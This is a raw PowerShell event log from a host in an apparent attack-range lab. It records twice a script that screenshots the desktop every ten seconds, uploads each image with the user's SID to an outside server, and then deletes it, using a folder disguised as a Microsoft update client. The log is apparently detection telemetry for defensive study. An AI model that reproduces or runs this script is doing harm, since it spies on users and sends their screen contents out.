410515102150x0394778Microsoft-Windows-PowerShell/Operationalwin-dc-ctus-attack-range-295.attackrange.local2ae5280c-b0aa-4b8d-a189-ad15191a7c0b3e1619fb-fb57-43ca-a40a-8028a8828439 4104152150x0394777Microsoft-Windows-PowerShell/Operationalwin-dc-ctus-attack-range-295.attackrange.local11[Reflection.Assembly]::LoadWithPartialName('System.Drawing'); function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bound.width, $bound.height; $graphics = [Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($bound.Location, [Drawing.Point]::Empty, $bound.size); $bmp.Save($path); $graphics.Dispose(); $bmp.Dispose() }; $bounds = [Drawing.Rectangle]::FromLTRB(0,0,1900,1080); function downloadFileUP($f){$name=$f.repalce(':\','').replace('\','/'); $valu=([System.Security.Principal.WindosIdentity]::GetCurrent()).User.Value; $vu=$valu+$name; Invoke-RestMethod -Uri 'https://wintervivern.com/screenshot.php' -Method Post -InFile $f -Headers@{'filename=$vu'} -UseDefaultCredentials}; $i=0; while($true) { $i=$i+1;$f='c:\Users\Public\MicrosoftUpdateClient\Microsoft_Update_tool_'+$i+'.dat'; screenshot $bounds $f; sleep 1; downloadFileUP($f); sleep 9; remote-Item $f -Force } 2ae5280c-b0aa-4b8d-a189-ad15191a7c0b 410013106190x0394799Microsoft-Windows-PowerShell/Operationalwin-dc-ctus-attack-range-295.attackrange.local Severity = Warning Host Name = ConsoleHost Host Version = 5.1.14393.5582 Host ID = a9079463-9b4f-49be-bd35-2c06881c9941 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [Reflection.Assembly]::LoadWithPartialName('System.Drawing'); function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bound.width, $bound.height; $graphics = [Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($bound.Location, [Drawing.Point]::Empty, $bound.size); $bmp.Save($path); $graphics.Dispose(); $bmp.Dispose() }; $bounds = [Drawing.Rectangle]::FromLTRB(0,0,1900,1080); function downloadFileUP($f){$name=$f.replace(':\','').replace('\','/'); $valu=([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value; $vu=$valu+$name; Invoke-RestMethod -Uri 'https://wintervivern.com/screenshot.php' -Method Post -InFile $f -Headers@{'filename=$vu'} -UseDefaultCredentials}; $i=0; while($true) { $i=$i+1;$f='c:\Users\Public\MicrosoftUpdateClient\Microsoft_Update_tool_'+$i+'.dat'; screenshot $bounds $f; sleep 1; downloadFileUP($f); sleep 9; remote-Item $f -Force } Engine Version = 5.1.14393.5582 Runspace ID = 3e1619fb-fb57-43ca-a40a-8028a8828439 Pipeline ID = 1 Command Name = New-Object Command Type = Cmdlet Script Name = Command Path = Sequence Number = 23 User = ATTACKRANGE\administrator Connected User = Shell ID = Microsoft.PowerShell Error Message = Exception calling ".ctor" with "2" argument(s): "Value of 'null' is not valid for 'stream'." Fully Qualified Error ID = ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand